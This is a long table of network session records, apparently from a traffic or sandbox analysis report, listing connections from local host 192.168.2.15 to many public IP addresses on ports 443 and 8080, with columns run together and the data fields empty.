                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18957192.168.2.155342276.103.122.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18958192.168.2.1539528104.25.228.1098080
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18959192.168.2.154416244.214.23.358080
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18960192.168.2.155997266.23.203.2228080
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18961192.168.2.15522748.163.165.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18962192.168.2.1548932211.146.70.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18963192.168.2.1549026205.110.235.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18964192.168.2.1547132169.22.23.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18965192.168.2.1536296153.213.212.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18966192.168.2.154685099.150.175.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18967192.168.2.155991861.69.95.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18968192.168.2.1540368208.18.43.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18969192.168.2.1551506151.173.80.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18970192.168.2.15478408.199.31.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18971192.168.2.1548552189.185.113.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18972192.168.2.1552096122.44.198.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18973192.168.2.1551446134.95.35.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18974192.168.2.1539348202.233.93.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18975192.168.2.1540780158.157.8.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18976192.168.2.154353082.64.194.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18977192.168.2.154823066.189.214.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18978192.168.2.1553546184.236.67.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18979192.168.2.1534766136.70.6.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18980192.168.2.1533556218.94.41.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18981192.168.2.15441888.66.222.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18982192.168.2.1560352191.201.4.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18983192.168.2.1556564126.30.152.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18984192.168.2.1544694152.87.52.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18985192.168.2.154576268.218.17.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18986192.168.2.1552240169.58.28.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18987192.168.2.155430835.200.171.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18988192.168.2.153695266.201.62.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18989192.168.2.1554492195.79.142.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18990192.168.2.1555108201.4.66.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18991192.168.2.1543552220.143.231.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18992192.168.2.155921099.15.141.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18993192.168.2.153795482.101.244.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18994192.168.2.1535042201.200.221.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18995192.168.2.1552440173.236.124.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18996192.168.2.1546714121.120.19.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18997192.168.2.153707644.160.22.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18998192.168.2.154142859.156.127.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18999192.168.2.155030818.89.14.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19000192.168.2.1555238199.195.224.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19001192.168.2.154361475.186.212.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19002192.168.2.1559098103.46.2.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19003192.168.2.1547660128.173.229.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19004192.168.2.1537960187.227.107.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19005192.168.2.1538352195.252.135.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19006192.168.2.154045668.97.25.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19007192.168.2.154138037.43.92.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19008192.168.2.155658261.40.87.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19009192.168.2.1541468163.169.197.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19010192.168.2.1555644131.132.24.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19011192.168.2.1559196174.25.43.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19012192.168.2.153899667.120.107.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19013192.168.2.1544360138.23.171.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19014192.168.2.1554252116.212.158.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19015192.168.2.1559774182.144.11.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19016192.168.2.1542094189.104.157.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19017192.168.2.154277066.112.81.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19018192.168.2.1546988196.158.108.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19019192.168.2.154477037.254.14.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19020192.168.2.1549616114.60.161.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19021192.168.2.1557602105.125.30.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19022192.168.2.1559358171.100.147.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19023192.168.2.1555414198.171.49.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19024192.168.2.1559508140.150.202.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19025192.168.2.1536366211.180.133.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19026192.168.2.1546396180.224.172.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19027192.168.2.155545447.241.50.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19028192.168.2.1548712132.156.68.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19029192.168.2.153879017.172.78.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19030192.168.2.1535420166.123.234.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19031192.168.2.153729062.201.139.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19032192.168.2.153999019.34.117.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19033192.168.2.155593684.234.192.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19034192.168.2.1538134131.162.45.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19035192.168.2.1540688160.184.79.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19036192.168.2.1554532191.217.127.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19037192.168.2.1554074205.222.23.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19038192.168.2.1543026123.130.38.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19039192.168.2.155146623.133.20.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19040192.168.2.15565402.218.233.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19041192.168.2.154644814.73.23.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19042192.168.2.155452217.240.129.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19043192.168.2.153999495.193.150.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19044192.168.2.1552206172.216.98.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19045192.168.2.1542148208.82.100.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19046192.168.2.153382685.139.124.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19047192.168.2.1538524174.94.62.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19048192.168.2.1534964206.153.136.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19049192.168.2.155174872.43.69.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19050192.168.2.155887040.218.239.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19051192.168.2.1554216152.21.69.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19052192.168.2.153612484.3.41.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19053192.168.2.1555752167.195.131.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19054192.168.2.154812837.136.30.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19055192.168.2.1542224113.33.139.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19056192.168.2.1550778206.6.52.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19057192.168.2.1556202111.247.39.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19058192.168.2.153995284.2.24.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19059192.168.2.1545846201.203.111.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19060192.168.2.1559686168.149.215.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19061192.168.2.1543688120.195.198.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19062192.168.2.1533240144.62.171.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19063192.168.2.1533064195.116.30.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19064192.168.2.1541816131.46.157.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19065192.168.2.154632873.242.148.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19066192.168.2.153404875.51.214.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19067192.168.2.1537932202.223.7.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19068192.168.2.1534604139.57.152.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19069192.168.2.1535364168.92.76.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19070192.168.2.154153674.102.26.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19071192.168.2.1554658157.142.158.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19072192.168.2.155979673.67.20.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19073192.168.2.1544070188.84.65.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19074192.168.2.1550210207.157.215.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19075192.168.2.154921625.55.52.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19076192.168.2.1552452217.135.164.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19077192.168.2.153576040.172.214.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19078192.168.2.1552518221.8.110.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19079192.168.2.1540090118.118.193.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19080192.168.2.155108870.170.136.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19081192.168.2.1560602173.218.136.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19082192.168.2.1535974143.137.48.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19083192.168.2.1533306211.2.3.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19084192.168.2.155490625.8.217.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19085192.168.2.154060045.190.229.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19086192.168.2.1533308107.226.69.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19087192.168.2.1538072134.162.144.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19088192.168.2.1539060166.87.156.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19089192.168.2.155621820.87.229.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19090192.168.2.154502694.181.73.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19091192.168.2.154873298.166.33.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19092192.168.2.1537778201.129.158.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19093192.168.2.1556904188.53.42.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19094192.168.2.156054462.54.50.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19095192.168.2.1534546176.47.224.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19096192.168.2.1553854216.161.226.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19097192.168.2.1542330106.92.8.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19098192.168.2.1546846217.9.147.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19099192.168.2.1540748164.52.79.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19100192.168.2.153974036.153.69.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19101192.168.2.1548028109.110.225.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19102192.168.2.1547374151.165.175.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19103192.168.2.1556196148.44.219.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19104192.168.2.1537654164.27.104.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19105192.168.2.154390888.143.31.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19106192.168.2.153686682.171.57.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19107192.168.2.1552732140.24.24.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19108192.168.2.154618831.29.139.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19109192.168.2.153811836.88.5.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19110192.168.2.154729885.189.255.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19111192.168.2.1553184161.48.135.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19112192.168.2.154057037.232.224.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19113192.168.2.1559278111.245.220.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19114192.168.2.1537842177.240.37.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19115192.168.2.1535954177.119.193.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19116192.168.2.1552890104.6.79.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19117192.168.2.1535304132.236.69.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19118192.168.2.153997498.121.105.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19119192.168.2.1551892206.115.80.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19120192.168.2.154834683.176.214.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19121192.168.2.154089023.28.27.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19122192.168.2.153902018.182.97.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19123192.168.2.1554600178.93.100.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19124192.168.2.153933414.102.138.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19125192.168.2.1547922168.145.9.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19126192.168.2.1552700121.60.251.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19127192.168.2.155534073.17.147.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19128192.168.2.1543216207.41.253.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19129192.168.2.153331457.118.194.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19130192.168.2.15397705.17.45.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19131192.168.2.15354969.51.59.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19132192.168.2.154444418.85.154.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19133192.168.2.15486544.254.97.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19134192.168.2.154875448.223.38.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19135192.168.2.1547806140.210.233.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19136192.168.2.1560370160.22.67.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19137192.168.2.1536164188.139.5.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19138192.168.2.1543402122.134.8.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19139192.168.2.1539760209.242.194.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19140192.168.2.153930838.102.64.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19141192.168.2.154225446.159.197.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19142192.168.2.1535004153.51.150.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19143192.168.2.1545448190.235.243.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19144192.168.2.154300494.12.38.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19145192.168.2.1556914115.97.202.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19146192.168.2.1549668146.161.241.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19147192.168.2.1556328131.110.68.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19148192.168.2.154077893.255.36.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19149192.168.2.155321680.253.252.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19150192.168.2.154337881.234.133.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19151192.168.2.154546282.193.144.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19152192.168.2.153901220.234.68.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19153192.168.2.155270414.200.1.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19154192.168.2.154449663.214.95.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19155192.168.2.155937027.240.98.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19156192.168.2.1551316203.62.212.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19157192.168.2.1547626161.215.96.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19158192.168.2.1557930142.121.207.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19159192.168.2.153789636.50.60.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19160192.168.2.154881059.56.23.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19161192.168.2.154598014.143.40.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19162192.168.2.155914690.229.101.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19163192.168.2.1555046174.3.82.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19164192.168.2.1552264205.25.175.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19165192.168.2.154244463.187.58.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19166192.168.2.1548148105.118.104.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19167192.168.2.1537476110.223.217.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19168192.168.2.1539222137.87.76.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19169192.168.2.154909831.111.210.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19170192.168.2.15429565.22.82.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19171192.168.2.1535064142.169.91.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19172192.168.2.154062066.156.90.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19173192.168.2.153315496.243.31.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19174192.168.2.155074654.24.45.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19175192.168.2.1559690173.87.153.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19176192.168.2.1550360213.102.114.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19177192.168.2.1550168190.1.28.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19178192.168.2.155773465.0.242.113443
